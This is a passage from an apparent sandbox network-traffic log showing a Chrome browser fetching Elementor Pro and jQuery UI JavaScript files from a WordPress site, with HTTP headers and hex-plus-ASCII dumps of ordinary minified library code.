                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:53:30 GMT
                                                                                                                                                                                                                              ETag: W/"670fd36a-1abe9"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ed982ab795-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC876INData Raw: 37 64 63 33 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 2d 66 72 6f 6e 74 65 6e 64 2c 70 72 6f 2d 65 6c 65 6d 65 6e 74 73 2d 68 61 6e 64 6c 65 72 73 2c 70 70 2d 74 6f 6f 6c 74 69 70 73 74 65 72 2c 70 70 2d 65 6c 65 6d 65 6e 74 73 2d 74 6f 6f 6c 74 69 70 2a 2a 2f 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 5f 70 72 6f 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 5f 70 72 6f 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 31 33 5d 2c 7b 33 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61
                                                                                                                                                                                                                              Data Ascii: 7dc3/**handles:elementor-pro-frontend,pro-elements-handlers,pp-tooltipster,pp-elements-tooltip**//*! elementor-pro - v3.24.0 - 09-10-2024 */(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[313],{3e3:(e,t,n)=>{"use strict";va
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 2e 74 72 69 67 67 65 72 28 22 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 2f 6d 6f 64 75 6c 65 73 2f 69 6e 69 74 2f 62 65 66 6f 72 65 22 29 2c 65 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 68 6f 6f 6b 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 2f 66 72 6f 6e 74 65 6e 64 2f 68 61 6e 64 6c 65 72 73 22 2c 65 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 28 28 65 2c 74 29 3d 3e 7b 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 65 5d 3d 6e 65 77 20 74 7d 29 29 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 6c 69 6e 6b 41 63 74 69 6f 6e 73 3d 7b 61 64 64 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 75 74 69 6c 73 2e 75
                                                                                                                                                                                                                              Data Ascii: orProFrontend.trigger("elementor-pro/modules/init/before"),e=elementorFrontend.hooks.applyFilters("elementor-pro/frontend/handlers",e),jQuery.each(e,((e,t)=>{this.modules[e]=new t})),this.modules.linkActions={addAction:function(){elementorFrontend.utils.u
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6e 66 69 67 3d 65 7d 63 61 6c 63 75 6c 61 74 65 53 74 69 63 6b 79 4d 65 6e 75 4e 61 76 48 65 69 67 68 74 28 29 7b 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 2e 63 73 73 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 73 65 74 74 69 6e 67 73 2e 6d 65 6e 75 48 65 69 67 68 74 43 73 73 56 61 72 4e 61 6d 65 2c 22 22 29 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e
                                                                                                                                                                                                                              Data Ascii: nfig=e}calculateStickyMenuNavHeight(){this.widgetConfig.elements.$dropdownMenuContainer.css(this.widgetConfig.settings.menuHeightCssVarName,"");const e=this.widgetConfig.elements.$dropdownMenuContainer.offset().top-jQuery(window).scrollTop();return elemen
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6f 67 67 6c 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 61 74 74 72 69 62 75 74 65 73 3f 2e 6d 65 6e 75 54 6f 67 67 6c 65 53 74 61 74 65 3f 22 74 72 75 65 22 3d 3d 3d 65 2e 61 74 74 72 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 61 74 74 72 69 62 75 74 65 73 2e 6d 65 6e 75 54 6f 67 67 6c 65 53 74 61 74 65 29 3a 65 2e 68 61 73 43 6c 61 73 73 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 63 6c 61 73 73 65 73 2e 6d 65 6e 75 54 6f 67 67 6c 65 41 63 74 69 76 65 43 6c 61 73 73 29 7d 7d 7d 2c 32 32 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 70 3d 45 6c 65 6d 65 6e 74 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 2e 75 72 6c 73 2e 61 73 73 65 74 73 2b
                                                                                                                                                                                                                              Data Ascii: oggle;return this.widgetConfig.attributes?.menuToggleState?"true"===e.attr(this.widgetConfig.attributes.menuToggleState):e.hasClass(this.widgetConfig.classes.menuToggleActiveClass)}}},2258:(e,t,n)=>{"use strict";n.p=ElementorProFrontendConfig.urls.assets+
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 69 7a 65 22 2c 74 68 69 73 2e 74 6f 67 67 6c 65 29 7d 75 6e 62 69 6e 64 45 76 65 6e 74 73 28 29 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 6f 66 66 28 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 74 6f 67 67 6c 65 29 7d 61 64 64 43 53 53 54 72 61 6e 73 66 6f 72 6d 45 76 65 6e 74 73 28 29 7b 74 68 69 73 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 29 26 26 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 26 26 28 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 3d 21 30 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 6f
                                                                                                                                                                                                                              Data Ascii: ize",this.toggle)}unbindEvents(){elementorFrontend.elements.$window.off("resize",this.toggle)}addCSSTransformEvents(){this.getElementSettings("motion_fx_motion_fx_scrolling")&&!this.isTransitionEventAdded&&(this.isTransitionEventAdded=!0,this.elements.$co
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 69 6f 6e 22 2c 22 63 6f 6e 74 61 69 6e 65 72 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 29 7b 6c 65 74 20 65 3b 69 3d 6f 2c 65 3d 22 63 6f 6c 75 6d 6e 22 3d 3d 3d 72 3f 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 22 3a 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 2c 6f 3d 6f 2e 66 69 6e 64 28 22 3e 20 22 2b 65 29 7d 63 6f 6e 73 74 20 61 3d 7b 74 79 70 65 3a 6e 2c 69 6e 74 65 72 61 63 74 69 6f 6e 73 3a 73 2c 65 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 3a 74 2c 24 65 6c 65 6d 65 6e 74 3a 6f 2c 24 64 69 6d 65 6e 73 69 6f 6e 73 45 6c 65 6d 65 6e 74 3a 69 2c 72 65 66 72 65 73 68 44 69 6d 65 6e 73 69 6f 6e 73 3a 74 68 69 73 2e 69 73 45 64 69 74 2c 72 61 6e 67 65 3a 74 5b 65 2b 22 5f 72 61 6e 67
                                                                                                                                                                                                                              Data Ascii: ion","container"].includes(r)){let e;i=o,e="column"===r?".elementor-widget-wrap":".elementor-widget-container",o=o.find("> "+e)}const a={type:n,interactions:s,elementSettings:t,$element:o,$dimensionsElement:i,refreshDimensions:this.isEdit,range:t[e+"_rang
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 2e 70 72 65 70 61 72 65 4f 70 74 69 6f 6e 73 28 65 29 3b 74 2e 73 65 74 53 65 74 74 69 6e 67 73 28 6e 29 2c 74 2e 72 65 66 72 65 73 68 28 29 7d 6f 6e 49 6e 69 74 28 29 7b 73 75 70 65 72 2e 6f 6e 49 6e 69 74 28 29 2c 74 68 69 73 2e 69 6e 69 74 45 66 66 65 63 74 73 28 29 2c 74 68 69 73 2e 61 64 64 43 53 53 54 72 61 6e 73 66 6f 72 6d 45 76 65 6e 74 73 28 29 2c 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 7d 6f 6e 45 6c 65 6d 65 6e 74 43 68 61 6e 67 65 28 65 29 7b 69 66 28 2f 6d 6f 74 69 6f 6e 5f 66 78 5f 28 28 73 63 72 6f 6c 6c 69 6e 67 29 7c 28 6d 6f 75 73 65 29 7c 28 64 65 76 69 63 65 73 29 29 24 2f 2e 74 65 73 74 28 65 29 29 72 65 74 75 72 6e 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 3d 3d 3d 65 26 26 74 68 69
                                                                                                                                                                                                                              Data Ascii: .prepareOptions(e);t.setSettings(n),t.refresh()}onInit(){super.onInit(),this.initEffects(),this.addCSSTransformEvents(),this.toggle()}onElementChange(e){if(/motion_fx_((scrolling)|(mouse)|(devices))$/.test(e))return"motion_fx_motion_fx_scrolling"===e&&thi
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 73 3d 31 30 30 2d 73 29 29 3a 65 3c 6e 2e 65 6e 64 3f 22 69 6e 2d 6f 75 74 2d 69 6e 22 3d 3d 3d 74 3f 73 3d 30 3a 22 6f 75 74 2d 69 6e 2d 6f 75 74 22 3d 3d 3d 74 3f 73 3d 31 30 30 3a 28 73 3d 74 68 69 73 2e 67 65 74 4d 6f 76 65 50 6f 69 6e 74 46 72 6f 6d 50 61 73 73 65 64 50 65 72 63 65 6e 74 73 28 6e 2e 65 6e 64 2d 6e 2e 73 74 61 72 74 2c 65 2d 6e 2e 73 74 61 72 74 29 2c 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 26 26 28 73 3d 31 30 30 2d 73 29 29 3a 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 3f 73 3d 30 3a 22 6f 75 74 2d 69 6e 22 3d 3d 3d 74 3f 73 3d 31 30 30 3a 28 73 3d 74 68 69 73 2e 67 65 74 4d 6f 76 65 50 6f 69 6e 74 46 72 6f 6d 50 61 73 73 65 64 50 65 72 63 65 6e 74 73 28 31 30 30 2d 6e 2e 65 6e 64 2c 31 30 30 2d 65 29 2c 22 69 6e 2d 6f 75 74 2d 69 6e 22 3d 3d
                                                                                                                                                                                                                              Data Ascii: s=100-s)):e<n.end?"in-out-in"===t?s=0:"out-in-out"===t?s=100:(s=this.getMovePointFromPassedPercents(n.end-n.start,e-n.start),"in-out"===t&&(s=100-s)):"in-out"===t?s=0:"out-in"===t?s=100:(s=this.getMovePointFromPassedPercents(100-n.end,100-e),"in-out-in"==
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 2c 73 3d 65 2e 6c 65 76 65 6c 2f 31 30 2c 69 3d 31 2d 73 2b 74 68 69 73 2e 67 65 74 45 66 66 65 63 74 56 61 6c 75 65 46 72 6f 6d 4d 6f 76 65 50 6f 69 6e 74 28 73 2c 6e 29 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 69 2c 22 77 69 6c 6c 2d 63 68 61 6e 67 65 22 3a 22 6f 70 61 63 69 74 79 22 7d 29 7d 62 6c 75 72 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 67 65 74 44 69 72 65 63 74 69 6f 6e 4d 6f 76 65 50 6f 69 6e 74 28 74 2c 65 2e 64 69 72 65 63 74 69 6f 6e 2c 65 2e 72 61 6e 67 65 29 2c 73 3d 65 2e 6c 65 76 65 6c 2d 74 68 69 73 2e 67 65 74 45 66 66 65 63 74 56 61 6c 75 65 46 72 6f 6d 4d 6f 76 65 50 6f 69 6e 74 28 65 2e 6c 65 76 65 6c 2c 6e 29 3b 74 68 69 73 2e 75 70 64 61 74 65 52 75 6c 65 50 61 72 74 28
                                                                                                                                                                                                                              Data Ascii: ,s=e.level/10,i=1-s+this.getEffectValueFromMovePoint(s,n);this.$element.css({opacity:i,"will-change":"opacity"})}blur(e,t){const n=this.getDirectionMovePoint(t,e.direction,e.range),s=e.level-this.getEffectValueFromMovePoint(e.level,n);this.updateRulePart(
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 24 65 6c 65 6d 65 6e 74 2e 63 73 73 28 7b 74 72 61 6e 73 66 6f 72 6d 3a 22 22 2c 66 69 6c 74 65 72 3a 22 22 2c 6f 70 61 63 69 74 79 3a 22 22 2c 22 77 69 6c 6c 2d 63 68 61 6e 67 65 22 3a 22 22 7d 29 7d 6f 6e 49 6e 69 74 28 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 22 24 74 61 72 67 65 74 45 6c 65 6d 65 6e 74 22 29 2c 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 7d 7d 74 2e 64 65 66 61 75 6c 74 3d 5f 64 65 66 61 75 6c 74 7d 2c 33 33 32 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 73 3d 6e 28 36 37 38 34 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64
                                                                                                                                                                                                                              Data Ascii: $element.css({transform:"",filter:"",opacity:"","will-change":""})}onInit(){this.$element=this.getSettings("$targetElement"),this.refresh()}}t.default=_default},3323:(e,t,n)=>{"use strict";var s=n(6784);Object.defineProperty(t,"__esModule",{value:!0}),t.d


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              121192.168.2.649857141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC565OUTGET /wp-includes/js/jquery/ui/core.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:01:32 GMT
                                                                                                                                                                                                                              ETag: W/"66f5693c-53d8"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ed9fdf47a4-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC877INData Raw: 35 33 64 38 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 33 2e 33 20 2d 20 32 30 32 34 2d 30 34 2d 32 36 0a 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65
                                                                                                                                                                                                                              Data Ascii: 53d8/*! jQuery UI - v1.13.3 - 2024-04-26* https://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effe
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 70 72 6f 67 72 65 73 73 62 61 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 72 65 73 69 7a 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 6d 65 6e 75 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 6c 69 64 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 6f 72 74 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 70 69 6e 6e 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 74 61 62 73 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 74 6f 6f 6c 74 69 70 2e 6a 73 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 3b 20 4c 69 63 65 6e 73 65
                                                                                                                                                                                                                              Data Ascii: e.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sortable.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js* Copyright jQuery Foundation and other contributors; License
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 44 65 66 61 75 6c 74 28 29 7d 29 7d 29 2c 65 6e 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 66 66 28 22 2e 75 69 2d 64 69 73 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 22 29 7d 7d 29 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 46 6f 63 75 73 61 62 6c 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72
                                                                                                                                                                                                                              Data Ascii: Default()})}),enableSelection:function(){return this.off(".ui-disableSelection")}}),/*! * jQuery UI Focusable 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.or
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 66 6f 72 6d 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 5f 66 6f 72 6d 28 29 2c 74 68 69 73 2e 66 6f 72 6d 2e 6c 65 6e 67 74 68 26 26 28 28 74 3d 74 68 69 73 2e 66 6f 72 6d 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 29 7c 7c 5b 5d 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 66 6f 72 6d 2e 6f 6e 28 22 72 65 73 65 74 2e 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 22 2c 74 68 69 73 2e 5f 66 6f 72 6d 52 65 73 65 74 48 61 6e 64 6c 65 72 29 2c 74 2e 70 75 73 68 28 74 68 69 73 29 2c 74 68 69 73 2e 66 6f 72 6d 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 2c 74 29 29 7d 2c 5f 75 6e 62 69 6e 64 46 6f 72 6d 52 65 73 65 74 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                              Data Ascii: form=this.element._form(),this.form.length&&((t=this.form.data("ui-form-reset-instances")||[]).length||this.form.on("reset.ui-form-reset",this._formResetHandler),t.push(this),this.form.data("ui-form-reset-instances",t))},_unbindFormResetHandler:function()
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 78 2e 75 69 2e 6b 65 79 43 6f 64 65 3d 7b 42 41 43 4b 53 50 41 43 45 3a 38 2c 43 4f 4d 4d 41 3a 31 38 38 2c 44 45 4c 45 54 45 3a 34 36 2c 44 4f 57 4e 3a 34 30 2c 45 4e 44 3a 33 35 2c 45 4e 54 45 52 3a 31 33 2c 45 53 43 41 50 45 3a 32 37 2c 48 4f 4d 45 3a 33 36 2c 4c 45 46 54 3a 33 37 2c 50 41 47 45 5f 44 4f 57 4e 3a 33 34 2c 50 41 47 45 5f 55 50 3a 33 33 2c 50 45 52 49 4f 44 3a 31 39 30 2c 52 49 47 48 54 3a 33 39 2c 53 50 41 43 45 3a 33 32 2c 54 41 42 3a 39 2c 55 50 3a 33 38 7d 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4c 61 62 65 6c 73 20 31 2e 31 33 2e 33
                                                                                                                                                                                                                              Data Ascii: ased under the MIT license. * https://jquery.org/license */x.ui.keyCode={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38},/*! * jQuery UI Labels 1.13.3
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 72 3d 2f 5b 5c 2b 5c 2d 5d 5c 64 2b 28 5c 2e 5b 5c 64 5d 2b 29 3f 25 3f 2f 2c 6c 3d 2f 5e 5c 77 2b 2f 2c 61 3d 2f 25 24 2f 2c 68 3d 78 2e 66 6e 2e 70 6f 73 69 74 69 6f 6e 2c 78 2e 70 6f 73 69 74 69 6f 6e 3d 7b 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 69 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 28 69 3d 28 65 3d 78 28 22 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 32 30 30 70 78 3b 68 65 69 67 68 74 3a 32 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 27 3e 3c 64 69 76 20 73 74 79 6c 65 3d 27 68 65 69 67 68 74 3a 33 30 30 70 78 3b 77 69 64 74 68 3a 61 75
                                                                                                                                                                                                                              Data Ascii: r=/[\+\-]\d+(\.[\d]+)?%?/,l=/^\w+/,a=/%$/,h=x.fn.position,x.position={scrollbarWidth:function(){var t,e,i;return void 0!==n?n:(i=(e=x("<div style='display:block;position:absolute;width:200px;height:200px;overflow:hidden;'><div style='height:300px;width:au
